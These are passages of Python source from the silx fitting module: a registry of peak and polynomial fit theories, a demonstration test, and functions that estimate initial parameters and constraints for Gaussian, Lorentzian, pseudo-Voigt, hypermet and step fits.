configure=fitfuns.configure)),
('Pseudo-Voigt Line',
FitTheory(description='Pseudo-Voigt functions',
function=functions.sum_pvoigt,
parameters=('Height', 'Position', 'FWHM', 'Eta'),
estimate=fitfuns.estimate_pvoigt,
configure=fitfuns.configure)),
('Area Pseudo-Voigt',
FitTheory(description='Pseudo-Voigt functions (area)',
function=functions.sum_apvoigt,
parameters=('Area', 'Position', 'FWHM', 'Eta'),
estimate=fitfuns.estimate_apvoigt,
configure=fitfuns.configure)),
('Split Gaussian',
FitTheory(description='Asymmetric gaussian functions',
function=functions.sum_splitgauss,
parameters=('Height', 'Position', 'LowFWHM',
'HighFWHM'),
estimate=fitfuns.estimate_splitgauss,
configure=fitfuns.configure)),
('Split Lorentz',
FitTheory(description='Asymmetric lorentzian functions',
function=functions.sum_splitlorentz,
parameters=('Height', 'Position', 'LowFWHM', 'HighFWHM'),
estimate=fitfuns.estimate_splitgauss,
configure=fitfuns.configure)),
('Split Pseudo-Voigt',
FitTheory(description='Asymmetric pseudo-Voigt functions',
function=functions.sum_splitpvoigt,
parameters=('Height', 'Position', 'LowFWHM',
'HighFWHM', 'Eta'),
estimate=fitfuns.estimate_splitpvoigt,
configure=fitfuns.configure)),
('Step Down',
FitTheory(description='Step down function',
function=functions.sum_stepdown,
parameters=('Height', 'Position', 'FWHM'),
estimate=fitfuns.estimate_stepdown,
configure=fitfuns.configure)),
('Step Up',
FitTheory(description='Step up function',
function=functions.sum_stepup,
parameters=('Height', 'Position', 'FWHM'),
estimate=fitfuns.estimate_stepup,
configure=fitfuns.configure)),
('Slit',
FitTheory(description='Slit function',
function=functions.sum_slit,
parameters=('Height', 'Position', 'FWHM', 'BeamFWHM'),
estimate=fitfuns.estimate_slit,
configure=fitfuns.configure)),
('Atan',
FitTheory(description='Arctan step up function',
function=functions.atan_stepup,
parameters=('Height', 'Position', 'Width'),
estimate=fitfuns.estimate_stepup,
configure=fitfuns.configure)),
('Hypermet',
FitTheory(description='Hypermet functions',
function=fitfuns.ahypermet, # customized version of functions.sum_ahypermet
parameters=('G_Area', 'Position', 'FWHM', 'ST_Area',
'ST_Slope', 'LT_Area', 'LT_Slope', 'Step_H'),
estimate=fitfuns.estimate_ahypermet,
configure=fitfuns.configure)),
# ('Periodic Gaussians',
# FitTheory(description='Periodic gaussian functions',
# function=functions.periodic_gauss,
# parameters=('N', 'Delta', 'Height', 'Position', 'FWHM'),
# estimate=fitfuns.estimate_periodic_gauss,
# configure=fitfuns.configure))
('Degree 2 Polynomial',
FitTheory(description='Degree 2 polynomial'
'\ny = a*x^2 + b*x +c',
function=fitfuns.poly,
parameters=['a', 'b', 'c'],
estimate=fitfuns.estimate_quadratic)),
('Degree 3 Polynomial',
FitTheory(description='Degree 3 polynomial'
'\ny = a*x^3 + b*x^2 + c*x + d',
function=fitfuns.poly,
parameters=['a', 'b', 'c', 'd'],
estimate=fitfuns.estimate_cubic)),
('Degree 4 Polynomial',
FitTheory(description='Degree 4 polynomial'
'\ny = a*x^4 + b*x^3 + c*x^2 + d*x + e',
function=fitfuns.poly,
parameters=['a', 'b', 'c', 'd', 'e'],
estimate=fitfuns.estimate_quartic)),
('Degree 5 Polynomial',
FitTheory(description='Degree 5 polynomial'
'\ny = a*x^5 + b*x^4 + c*x^3 + d*x^2 + e*x + f',
function=fitfuns.poly,
parameters=['a', 'b', 'c', 'd', 'e', 'f'],
estimate=fitfuns.estimate_quintic)),
))
"""Dictionary of fit theories: fit functions and their associated estimation
function, parameters list, configuration function and description.
"""
def test(a):
from silx.math.fit import fitmanager
x = numpy.arange(1000).astype(numpy.float)
p = [1500, 100., 50.0,
1500, 700., 50.0]
y_synthetic = functions.sum_gauss(x, *p) + 1
fit = fitmanager.FitManager(x, y_synthetic)
fit.addtheory('Gaussians', functions.sum_gauss, ['Height', 'Position', 'FWHM'],
a.estimate_height_position_fwhm)
fit.settheory('Gaussians')
fit.setbackground('Linear')
fit.estimate()
fit.runfit()
y_fit = fit.gendata()
print("Fit parameter names: %s" % str(fit.get_names()))
print("Theoretical parameters: %s" % str(numpy.append([1, 0], p)))
print("Fitted parameters: %s" % str(fit.get_fitted_parameters()))
try:
from silx.gui import qt
from silx.gui.plot import plot1D
app = qt.QApplication([])
# Offset of 1 to see the difference in log scale
plot1D(x, (y_synthetic + 1, y_fit), "Input data + 1, Fit")
app.exec_()
except ImportError:
_logger.warning("Unable to load qt binding, can't plot results.")
if __name__ == "__main__":
test(fitfuns)
| ss wrapping functions from :class:`silx.math.fit.functions`
and providing estimate functions for all of these fit functions."""
def __init__(self, config=None):
if config is None:
self.config = DEFAULT_CONFIG
else:
self.config = config
def ahypermet(self, x, *pars):
"""
Wrapping of :func:`silx.math.fit.functions.sum_ahypermet` without
the tail flags in the function signature.
Depending on the value of `self.config['HypermetTails']`, one can
activate or deactivate the various terms of the hypermet function.
`self.config['HypermetTails']` must be an integer between 0 and 15.
It is a set of 4 binary flags, one for activating each one of the
hypermet terms: *gaussian function, short tail, long tail, step*.
For example, 15 can be expressed as ``1111`` in base 2, so a flag of
15 means all terms are active.
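As a purely illustrative decoding (the value 5 is chosen only for this
example): ``5`` is ``0101`` in base 2, so the gaussian term (bit 0) and
the long tail (bit 2) are active while the short tail (bit 1) and the
step (bit 3) are disabled::

    tails = 5
    g_term = tails & 1            # 1 -> gaussian active
    st_term = (tails >> 1) & 1    # 0 -> short tail disabled
    lt_term = (tails >> 2) & 1    # 1 -> long tail active
    step_term = (tails >> 3) & 1  # 0 -> step disabled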
"""
g_term = self.config['HypermetTails'] & 1
st_term = (self.config['HypermetTails'] >> 1) & 1
lt_term = (self.config['HypermetTails'] >> 2) & 1
step_term = (self.config['HypermetTails'] >> 3) & 1
return functions.sum_ahypermet(x, *pars,
gaussian_term=g_term, st_term=st_term,
lt_term=lt_term, step_term=step_term)
def poly(self, x, *pars):
"""Order n polynomial.
The order of the polynomial is defined by the number of
coefficients (``*pars``).
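Note that :func:`numpy.poly1d` treats the first coefficient as the
highest-degree term; as a purely illustrative example,
``poly(x, 1, 2, 3)`` evaluates ``x**2 + 2*x + 3``.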
"""
p = numpy.poly1d(pars)
return p(x)
@staticmethod
def estimate_poly(x, y, n=2):
"""Estimate polynomial coefficients for a degree n polynomial.
"""
pcoeffs = numpy.polyfit(x, y, n)
constraints = numpy.zeros((n + 1, 3), numpy.float)
return pcoeffs, constraints
def estimate_quadratic(self, x, y):
"""Estimate quadratic coefficients
"""
return self.estimate_poly(x, y, n=2)
def estimate_cubic(self, x, y):
"""Estimate coefficients for a degree 3 polynomial
"""
return self.estimate_poly(x, y, n=3)
def estimate_quartic(self, x, y):
"""Estimate coefficients for a degree 4 polynomial
"""
return self.estimate_poly(x, y, n=4)
def estimate_quintic(self, x, y):
"""Estimate coefficients for a degree 5 polynomial
"""
return self.estimate_poly(x, y, n=5)
def strip_bg(self, y):
"""Return the strip background of y, using parameters from
:attr:`config` dictionary (*StripBackgroundFlag, StripWidth,
StripIterations, StripThresholdFactor*)"""
remove_strip_bg = self.config.get('StripBackgroundFlag', False)
if remove_strip_bg:
if self.config['SmoothingFlag']:
y = savitsky_golay(y, self.config['SmoothingWidth'])
strip_width = self.config['StripWidth']
strip_niterations = self.config['StripIterations']
strip_thr_factor = self.config['StripThresholdFactor']
return strip(y, w=strip_width,
niterations=strip_niterations,
factor=strip_thr_factor)
else:
return numpy.zeros_like(y)
def guess_yscaling(self, y):
"""Estimate scaling for y prior to peak search.
A smoothing filter is applied to y to estimate the noise level
(chi-squared)
:param y: Data array
:return: Scaling factor
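In this implementation the factor is ``1. / chisq``, where ``chisq`` is
the mean of ``(y - ysmooth)**2 / abs(y)`` over the non-zero samples and
``ysmooth`` is a 3-point moving average of ``y``; 1.0 is returned when
this estimate is not strictly positive.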
"""
# ensure y is an array
yy = numpy.array(y, copy=False)
# smooth
convolution_kernel = numpy.ones(shape=(3,)) / 3.
ysmooth = numpy.convolve(y, convolution_kernel, mode="same")
# remove zeros
idx_array = numpy.fabs(y) > 0.0
yy = yy[idx_array]
ysmooth = ysmooth[idx_array]
# compute scaling factor
chisq = numpy.mean((yy - ysmooth)**2 / numpy.fabs(yy))
if chisq > 0:
return 1. / chisq
else:
return 1.0
def peak_search(self, y, fwhm, sensitivity):
"""Search for peaks in y array, after padding the array and
multiplying its value by a scaling factor.
:param y: 1-D data array
:param int fwhm: Typical full width at half maximum for peaks,
in number of points. This parameter is used to discriminate between
true peaks and background fluctuations.
:param float sensitivity: Sensitivity parameter. This is a threshold factor
for peak detection. Only peaks larger than the standard deviation
of the noise multiplied by this sensitivity parameter are detected.
:return: List of peak indices
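A minimal usage sketch (the argument values are arbitrary examples)::

    indices = self.peak_search(y, fwhm=5, sensitivity=3.5)

The returned indices refer to the original, unpadded ``y`` array.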
"""
# add padding
ysearch = numpy.ones((len(y) + 2 * fwhm,), numpy.float)
ysearch[0:fwhm] = y[0]
ysearch[-1:-fwhm - 1:-1] = y[len(y)-1]
ysearch[fwhm:fwhm + len(y)] = y[:]
scaling = self.guess_yscaling(y) if self.config["AutoScaling"] else self.config["Yscaling"]
if len(ysearch) > 1.5 * fwhm:
peaks = peak_search(scaling * ysearch,
fwhm=fwhm, sensitivity=sensitivity)
return [peak_index - fwhm for peak_index in peaks
if 0 <= peak_index - fwhm < len(y)]
else:
return []
def estimate_height_position_fwhm(self, x, y):
"""Estimation of *Height, Position, FWHM* of peaks, for gaussian-like
curves.
This function finds how many parameters are needed, based on the
number of peaks detected. Then it estimates the fit parameters
with a few iterations of fitting gaussian functions.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Height, Position, FWHM*.
Fit constraints depend on :attr:`config`.
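The returned parameter sequence is the concatenation of one
``(height, position, fwhm)`` triplet per detected peak, e.g.
``[h1, p1, w1, h2, p2, w2]`` for two peaks (placeholder names), and the
constraint array contains one 3-column row per parameter.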
"""
fittedpar = []
bg = self.strip_bg(y)
if self.config['AutoFwhm']:
search_fwhm = guess_fwhm(y)
else:
search_fwhm = int(float(self.config['FwhmPoints']))
search_sens = float(self.config['Sensitivity'])
if search_fwhm < 3:
_logger.warning("Setting peak fwhm to 3 (lower limit)")
search_fwhm = 3
self.config['FwhmPoints'] = 3
if search_sens < 1:
_logger.warning("Setting peak search sensitivity to 1. " +
"(lower limit to filter out noise peaks)")
search_sens = 1
self.config['Sensitivity'] = 1
npoints = len(y)
# Find indices of peaks in data array
peaks = self.peak_search(y,
fwhm=search_fwhm,
sensitivity=search_sens)
if not len(peaks):
forcepeak = int(float(self.config.get('ForcePeakPresence', 0)))
if forcepeak:
delta = y - bg
# get index of global maximum
# (first one if several samples are equal to this value)
peaks = [numpy.nonzero(delta == delta.max())[0][0]]
# Find index of largest peak in peaks array
index_largest_peak = 0
if len(peaks) > 0:
# estimate fwhm as 5 * sampling interval
sig = 5 * abs(x[npoints - 1] - x[0]) / npoints
peakpos = x[int(peaks[0])]
if abs(peakpos) < 1.0e-16:
peakpos = 0.0
param = numpy.array(
[y[int(peaks[0])] - bg[int(peaks[0])], peakpos, sig])
height_largest_peak = param[0]
peak_index = 1
for i in peaks[1:]:
param2 = numpy.array(
[y[int(i)] - bg[int(i)], x[int(i)], sig])
param = numpy.concatenate((param, param2))
if param2[0] > height_largest_peak:
height_largest_peak = param2[0]
index_largest_peak = peak_index
peak_index += 1
# Subtract background
xw = x
yw = y - bg
cons = numpy.zeros((len(param), 3), numpy.float)
# peak height must be positive
cons[0:len(param):3, 0] = CPOSITIVE
# force peaks to stay around their position
cons[1:len(param):3, 0] = CQUOTED
# set possible peak range to estimated peak +- guessed fwhm
if len(xw) > search_fwhm:
fwhmx = numpy.fabs(xw[int(search_fwhm)] - xw[0])
cons[1:len(param):3, 1] = param[1:len(param):3] - 0.5 * fwhmx
cons[1:len(param):3, 2] = param[1:len(param):3] + 0.5 * fwhmx
else:
shape = [max(1, int(x)) for x in (param[1:len(param):3])]
cons[1:len(param):3, 1] = min(xw) * numpy.ones(
shape,
numpy.float)
cons[1:len(param):3, 2] = max(xw) * numpy.ones(
shape,
numpy.float)
# ensure fwhm is positive
cons[2:len(param):3, 0] = CPOSITIVE
# run a quick iterative fit (4 iterations) to improve
# estimations
fittedpar, _, _ = leastsq(functions.sum_gauss, xw, yw, param,
max_iter=4, constraints=cons.tolist(),
full_output=True)
# set final constraints based on config parameters
cons = numpy.zeros((len(fittedpar), 3), numpy.float)
peak_index = 0
for i in range(len(peaks)):
# Setup height area constraints
if not self.config['NoConstraintsFlag']:
if self.config['PositiveHeightAreaFlag']:
cons[peak_index, 0] = CPOSITIVE
cons[peak_index, 1] = 0
cons[peak_index, 2] = 0
peak_index += 1
# Setup position constraints
if not self.config['NoConstraintsFlag']:
if self.config['QuotedPositionFlag']:
cons[peak_index, 0] = CQUOTED
cons[peak_index, 1] = min(x)
cons[peak_index, 2] = max(x)
peak_index += 1
# Setup positive FWHM constraints
if not self.config['NoConstraintsFlag']:
if self.config['PositiveFwhmFlag']:
cons[peak_index, 0] = CPOSITIVE
cons[peak_index, 1] = 0
cons[peak_index, 2] = 0
if self.config['SameFwhmFlag']:
if i != index_largest_peak:
cons[peak_index, 0] = CFACTOR
cons[peak_index, 1] = 3 * index_largest_peak + 2
cons[peak_index, 2] = 1.0
peak_index += 1
return fittedpar, cons
def estimate_agauss(self, x, y):
"""Estimation of *Area, Position, FWHM* of peaks, for gaussian-like
curves.
This function uses :meth:`estimate_height_position_fwhm`, then
converts the height parameters to area under the curve with the
formula ``area = sqrt(2*pi) * height * fwhm / (2 * sqrt(2 * log(2)))``
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Area, Position, FWHM*.
Fit constraints depend on :attr:`config`.
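As a rough numerical illustration, a peak of height 10 and fwhm 2 gives
``area = sqrt(2*pi) * 10 * 2 / (2 * sqrt(2 * log(2)))``, i.e. about 21.3.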
"""
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
# get the number of found peaks
npeaks = len(fittedpar) // 3
for i in range(npeaks):
height = fittedpar[3 * i]
fwhm = fittedpar[3 * i + 2]
# Replace height with area in fittedpar
fittedpar[3 * i] = numpy.sqrt(2 * numpy.pi) * height * fwhm / (
2.0 * numpy.sqrt(2 * numpy.log(2)))
return fittedpar, cons
def estimate_alorentz(self, x, y):
"""Estimation of *Area, Position, FWHM* of peaks, for Lorentzian
curves.
This function uses :meth:`estimate_height_position_fwhm`, then
converts the height parameters to area under the curve with the
formula ``area = height * fwhm * 0.5 * pi``
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Area, Position, FWHM*.
Fit constraints depend on :attr:`config`.
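With the same illustrative height 10 and fwhm 2 as above, this gives
``area = 10 * 2 * 0.5 * pi``, i.e. about 31.4.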
"""
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
# get the number of found peaks
npeaks = len(fittedpar) // 3
for i in range(npeaks):
height = fittedpar[3 * i]
fwhm = fittedpar[3 * i + 2]
# Replace height with area in fittedpar
fittedpar[3 * i] = (height * fwhm * 0.5 * numpy.pi)
return fittedpar, cons
def estimate_splitgauss(self, x, y):
"""Estimation of *Height, Position, FWHM1, FWHM2* of peaks, for
asymmetric gaussian-like curves.
This function uses :meth:`estimate_height_position_fwhm`, then
adds a second (identical) estimation of FWHM to the fit parameters
for each peak, and the corresponding constraint.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Height, Position, FWHM1, FWHM2*.
Fit constraints depend on :attr:`config`.
"""
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
# get the number of found peaks
npeaks = len(fittedpar) // 3
estimated_parameters = []
estimated_constraints = numpy.zeros((4 * npeaks, 3), numpy.float)
for i in range(npeaks):
for j in range(3):
estimated_parameters.append(fittedpar[3 * i + j])
# fwhm2 estimate = fwhm1
estimated_parameters.append(fittedpar[3 * i + 2])
# height
estimated_constraints[4 * i, 0] = cons[3 * i, 0]
estimated_constraints[4 * i, 1] = cons[3 * i, 1]
estimated_constraints[4 * i, 2] = cons[3 * i, 2]
# position
estimated_constraints[4 * i + 1, 0] = cons[3 * i + 1, 0]
estimated_constraints[4 * i + 1, 1] = cons[3 * i + 1, 1]
estimated_constraints[4 * i + 1, 2] = cons[3 * i + 1, 2]
# fwhm1
estimated_constraints[4 * i + 2, 0] = cons[3 * i + 2, 0]
estimated_constraints[4 * i + 2, 1] = cons[3 * i + 2, 1]
estimated_constraints[4 * i + 2, 2] = cons[3 * i + 2, 2]
# fwhm2
estimated_constraints[4 * i + 3, 0] = cons[3 * i + 2, 0]
estimated_constraints[4 * i + 3, 1] = cons[3 * i + 2, 1]
estimated_constraints[4 * i + 3, 2] = cons[3 * i + 2, 2]
if cons[3 * i + 2, 0] == CFACTOR:
# convert indices of related parameters
# (this happens if SameFwhmFlag == True)
estimated_constraints[4 * i + 2, 1] = \
int(cons[3 * i + 2, 1] / 3) * 4 + 2
estimated_constraints[4 * i + 3, 1] = \
int(cons[3 * i + 2, 1] / 3) * 4 + 3
return estimated_parameters, estimated_constraints
def estimate_pvoigt(self, x, y):
"""Estimation of *Height, Position, FWHM, eta* of peaks, for
pseudo-Voigt curves.
Pseudo-Voigt are a sum of a gaussian curve *G(x)* and a lorentzian
curve *L(x)* with the same height, center, fwhm parameters:
``y(x) = eta * G(x) + (1-eta) * L(x)``
This function uses :meth:`estimate_height_position_fwhm`, then
adds a constant estimation of *eta* (0.5) to the fit parameters
for each peak, and the corresponding constraint.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Height, Position, FWHM, eta*.
Constraint for the eta parameter can be set to QUOTED (0.--1.)
by setting :attr:`config`['QuotedEtaFlag'] to ``True``.
If this is not the case, the constraint code is set to FREE.
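With the convention written above, ``eta = 1`` corresponds to a pure
gaussian profile and ``eta = 0`` to a pure lorentzian; the constant
initial estimate of 0.5 therefore starts from an even mix.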
"""
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
npeaks = len(fittedpar) // 3
newpar = []
newcons = numpy.zeros((4 * npeaks, 3), numpy.float)
# find out related parameters proper index
if not self.config['NoConstraintsFlag']:
if self.config['SameFwhmFlag']:
j = 0
# get the index of the free FWHM
for i in range(npeaks):
if cons[3 * i + 2, 0] != 4:
j = i
for i in range(npeaks):
if i != j:
cons[3 * i + 2, 1] = 4 * j + 2
for i in range(npeaks):
newpar.append(fittedpar[3 * i])
newpar.append(fittedpar[3 * i + 1])
newpar.append(fittedpar[3 * i + 2])
newpar.append(0.5)
# height
newcons[4 * i, 0] = cons[3 * i, 0]
newcons[4 * i, 1] = cons[3 * i, 1]
newcons[4 * i, 2] = cons[3 * i, 2]
# position
newcons[4 * i + 1, 0] = cons[3 * i + 1, 0]
newcons[4 * i + 1, 1] = cons[3 * i + 1, 1]
newcons[4 * i + 1, 2] = cons[3 * i + 1, 2]
# fwhm
newcons[4 * i + 2, 0] = cons[3 * i + 2, 0]
newcons[4 * i + 2, 1] = cons[3 * i + 2, 1]
newcons[4 * i + 2, 2] = cons[3 * i + 2, 2]
# Eta constraints
newcons[4 * i + 3, 0] = CFREE
newcons[4 * i + 3, 1] = 0
newcons[4 * i + 3, 2] = 0
if self.config['QuotedEtaFlag']:
newcons[4 * i + 3, 0] = CQUOTED
newcons[4 * i + 3, 1] = 0.0
newcons[4 * i + 3, 2] = 1.0
return newpar, newcons
def estimate_splitpvoigt(self, x, y):
"""Estimation of *Height, Position, FWHM1, FWHM2, eta* of peaks, for
asymmetric pseudo-Voigt curves.
This function uses :meth:`estimate_height_position_fwhm`, then
adds an identical FWHM2 parameter and a constant estimation of
*eta* (0.5) to the fit parameters for each peak, and the corresponding
constraints.
Constraint for the eta parameter can be set to QUOTED (0.--1.)
by setting :attr:`config`['QuotedEtaFlag'] to ``True``.
If this is not the case, the constraint code is set to FREE.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Height, Position, FWHM1, FWHM2, eta*.
"""
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
npeaks = len(fittedpar) // 3
newpar = []
newcons = numpy.zeros((5 * npeaks, 3), numpy.float)
# find out related parameters proper index
if not self.config['NoConstraintsFlag']:
if self.config['SameFwhmFlag']:
j = 0
# get the index of the free FWHM
for i in range(npeaks):
if cons[3 * i + 2, 0] != 4:
j = i
for i in range(npeaks):
if i != j:
cons[3 * i + 2, 1] = 4 * j + 2
for i in range(npeaks):
# height
newpar.append(fittedpar[3 * i])
# position
newpar.append(fittedpar[3 * i + 1])
# fwhm1
newpar.append(fittedpar[3 * i + 2])
# fwhm2 estimate equal to fwhm1
newpar.append(fittedpar[3 * i + 2])
# eta
newpar.append(0.5)
# constraint codes
# ----------------
# height
newcons[5 * i, 0] = cons[3 * i, 0]
# position
newcons[5 * i + 1, 0] = cons[3 * i + 1, 0]
# fwhm1
newcons[5 * i + 2, 0] = cons[3 * i + 2, 0]
# fwhm2
newcons[5 * i + 3, 0] = cons[3 * i + 2, 0]
# cons 1
# ------
newcons[5 * i, 1] = cons[3 * i, 1]
newcons[5 * i + 1, 1] = cons[3 * i + 1, 1]
newcons[5 * i + 2, 1] = cons[3 * i + 2, 1]
newcons[5 * i + 3, 1] = cons[3 * i + 2, 1]
# cons 2
# ------
newcons[5 * i, 2] = cons[3 * i, 2]
newcons[5 * i + 1, 2] = cons[3 * i + 1, 2]
newcons[5 * i + 2, 2] = cons[3 * i + 2, 2]
newcons[5 * i + 3, 2] = cons[3 * i + 2, 2]
if cons[3 * i + 2, 0] == CFACTOR:
# fwhm2 constraint depends on fwhm1
newcons[5 * i + 3, 1] = newcons[5 * i + 2, 1] + 1
# eta constraints
newcons[5 * i + 4, 0] = CFREE
newcons[5 * i + 4, 1] = 0
newcons[5 * i + 4, 2] = 0
if self.config['QuotedEtaFlag']:
newcons[5 * i + 4, 0] = CQUOTED
newcons[5 * i + 4, 1] = 0.0
newcons[5 * i + 4, 2] = 1.0
return newpar, newcons
def estimate_apvoigt(self, x, y):
"""Estimation of *Area, Position, FWHM1, eta* of peaks, for
pseudo-Voigt curves.
This function uses :meth:`estimate_pvoigt`, then converts the height
parameter to area.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Area, Position, FWHM, eta*.
"""
fittedpar, cons = self.estimate_pvoigt(x, y)
npeaks = len(fittedpar) // 4
# Assume 50% of the area is determined by the gaussian and 50% by
# the Lorentzian.
for i in range(npeaks):
height = fittedpar[4 * i]
fwhm = fittedpar[4 * i + 2]
fittedpar[4 * i] = 0.5 * (height * fwhm * 0.5 * numpy.pi) +\
0.5 * (height * fwhm / (2.0 * numpy.sqrt(2 * numpy.log(2)))
) * numpy.sqrt(2 * numpy.pi)
return fittedpar, cons
def estimate_ahypermet(self, x, y):
"""Estimation of *area, position, fwhm, st_area_r, st_slope_r,
lt_area_r, lt_slope_r, step_height_r* of peaks, for hypermet curves.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*area, position, fwhm, st_area_r, st_slope_r,
lt_area_r, lt_slope_r, step_height_r* .
"""
yscaling = self.config.get('Yscaling', 1.0)
if yscaling == 0:
yscaling = 1.0
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
npeaks = len(fittedpar) // 3
newpar = []
newcons = numpy.zeros((8 * npeaks, 3), numpy.float)
main_peak = 0
# find out related parameters proper index
if not self.config['NoConstraintsFlag']:
if self.config['SameFwhmFlag']:
j = 0
# get the index of the free FWHM
for i in range(npeaks):
if cons[3 * i + 2, 0] != 4:
j = i
for i in range(npeaks):
if i != j:
cons[3 * i + 2, 1] = 8 * j + 2
main_peak = j
for i in range(npeaks):
if fittedpar[3 * i] > fittedpar[3 * main_peak]:
main_peak = i
for i in range(npeaks):
height = fittedpar[3 * i]
position = fittedpar[3 * i + 1]
fwhm = fittedpar[3 * i + 2]
area = (height * fwhm / (2.0 * numpy.sqrt(2 * numpy.log(2)))
) * numpy.sqrt(2 * numpy.pi)
# the gaussian parameters
newpar.append(area)
newpar.append(position)
newpar.append(fwhm)
# print "area, pos , fwhm = ",area,position,fwhm
# Avoid zero derivatives because of not calculating contribution
g_term = 1
st_term = 1
lt_term = 1
step_term = 1
if self.config['HypermetTails'] != 0:
g_term = self.config['HypermetTails'] & 1
st_term = (self.config['HypermetTails'] >> 1) & 1
lt_term = (self.config['HypermetTails'] >> 2) & 1
step_term = (self.config['HypermetTails'] >> 3) & 1
if g_term == 0:
# fix the gaussian parameters
newcons[8 * i, 0] = CFIXED
newcons[8 * i + 1, 0] = CFIXED
newcons[8 * i + 2, 0] = CFIXED
# the short tail parameters
if ((area * yscaling) <
self.config['MinGaussArea4ShortTail']) | \
(st_term == 0):
newpar.append(0.0)
newpar.append(0.0)
newcons[8 * i + 3, 0] = CFIXED
newcons[8 * i + 3, 1] = 0.0
newcons[8 * i + 3, 2] = 0.0
newcons[8 * i + 4, 0] = CFIXED
newcons[8 * i + 4, 1] = 0.0
newcons[8 * i + 4, 2] = 0.0
else:
newpar.append(self.config['InitialShortTailAreaRatio'])
newpar.append(self.config['InitialShortTailSlopeRatio'])
newcons[8 * i + 3, 0] = CQUOTED
newcons[8 * i + 3, 1] = self.config['MinShortTailAreaRatio']
newcons[8 * i + 3, 2] = self.config['MaxShortTailAreaRatio']
newcons[8 * i + 4, 0] = CQUOTED
newcons[8 * i + 4, 1] = self.config['MinShortTailSlopeRatio']
newcons[8 * i + 4, 2] = self.config['MaxShortTailSlopeRatio']
# the long tail parameters
if ((area * yscaling) <
self.config['MinGaussArea4LongTail']) | \
(lt_term == 0):
newpar.append(0.0)
newpar.append(0.0)
newcons[8 * i + 5, 0] = CFIXED
newcons[8 * i + 5, 1] = 0.0
newcons[8 * i + 5, 2] = 0.0
newcons[8 * i + 6, 0] = CFIXED
newcons[8 * i + 6, 1] = 0.0
newcons[8 * i + 6, 2] = 0.0
else:
newpar.append(self.config['InitialLongTailAreaRatio'])
newpar.append(self.config['InitialLongTailSlopeRatio'])
newcons[8 * i + 5, 0] = CQUOTED
newcons[8 * i + 5, 1] = self.config['MinLongTailAreaRatio']
newcons[8 * i + 5, 2] = self.config['MaxLongTailAreaRatio']
newcons[8 * i + 6, 0] = CQUOTED
newcons[8 * i + 6, 1] = self.config['MinLongTailSlopeRatio']
newcons[8 * i + 6, 2] = self.config['MaxLongTailSlopeRatio']
# the step parameters
if ((height * yscaling) <
self.config['MinGaussHeight4StepTail']) | \
(step_term == 0):
newpar.append(0.0)
newcons[8 * i + 7, 0] = CFIXED
newcons[8 * i + 7, 1] = 0.0
newcons[8 * i + 7, 2] = 0.0
else:
newpar.append(self.config['InitialStepTailHeightRatio'])
newcons[8 * i + 7, 0] = CQUOTED
newcons[8 * i + 7, 1] = self.config['MinStepTailHeightRatio']
newcons[8 * i + 7, 2] = self.config['MaxStepTailHeightRatio']
# if self.config['NoConstraintsFlag'] == 1:
# newcons=numpy.zeros((8*npeaks, 3),numpy.float)
if npeaks > 0:
if g_term:
if self.config['PositiveHeightAreaFlag']:
for i in range(npeaks):
newcons[8 * i, 0] = CPOSITIVE
if self.config['PositiveFwhmFlag']:
for i in range(npeaks):
newcons[8 * i + 2, 0] = CPOSITIVE
if self.config['SameFwhmFlag']:
for i in range(npeaks):
if i != main_peak:
newcons[8 * i + 2, 0] = CFACTOR
newcons[8 * i + 2, 1] = 8 * main_peak + 2
newcons[8 * i + 2, 2] = 1.0
if self.config['HypermetQuotedPositionFlag']:
for i in range(npeaks):
delta = self.config['DeltaPositionFwhmUnits'] * fwhm
newcons[8 * i + 1, 0] = CQUOTED
newcons[8 * i + 1, 1] = newpar[8 * i + 1] - delta
newcons[8 * i + 1, 2] = newpar[8 * i + 1] + delta
if self.config['SameSlopeRatioFlag']:
for i in range(npeaks):
if i != main_peak:
newcons[8 * i + 4, 0] = CFACTOR
newcons[8 * i + 4, 1] = 8 * main_peak + 4
newcons[8 * i + 4, 2] = 1.0
newcons[8 * i + 6, 0] = CFACTOR
newcons[8 * i + 6, 1] = 8 * main_peak + 6
newcons[8 * i + 6, 2] = 1.0
if self.config['SameAreaRatioFlag']:
for i in range(npeaks):
if i != main_peak:
newcons[8 * i + 3, 0] = CFACTOR
newcons[8 * i + 3, 1] = 8 * main_peak + 3
newcons[8 * i + 3, 2] = 1.0
newcons[8 * i + 5, 0] = CFACTOR
newcons[8 * i + 5, 1] = 8 * main_peak + 5
newcons[8 * i + 5, 2] = 1.0
return newpar, newcons
def estimate_stepdown(self, x, y):
"""Estimation of parameters for stepdown curves.
The function estimates gaussian parameters for the derivative of
the data, takes the largest gaussian peak and uses its estimated
parameters to define the center of the step and its fwhm. The
estimated amplitude returned is simply ``max(y) - min(y)``.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each stepdown are:
*height, centroid, fwhm* .
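The derivative is approximated by convolving ``y`` with the kernel
``[-0.25, -0.75, 0.0, 0.75, 0.25]``, so a downward step in the data
appears as a positive peak whose position and width provide the step
centroid and fwhm.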
"""
crappyfilter = [-0.25, -0.75, 0.0, 0.75, 0.25]
cutoff = len(crappyfilter) // 2
y_deriv = numpy.convolve(y,
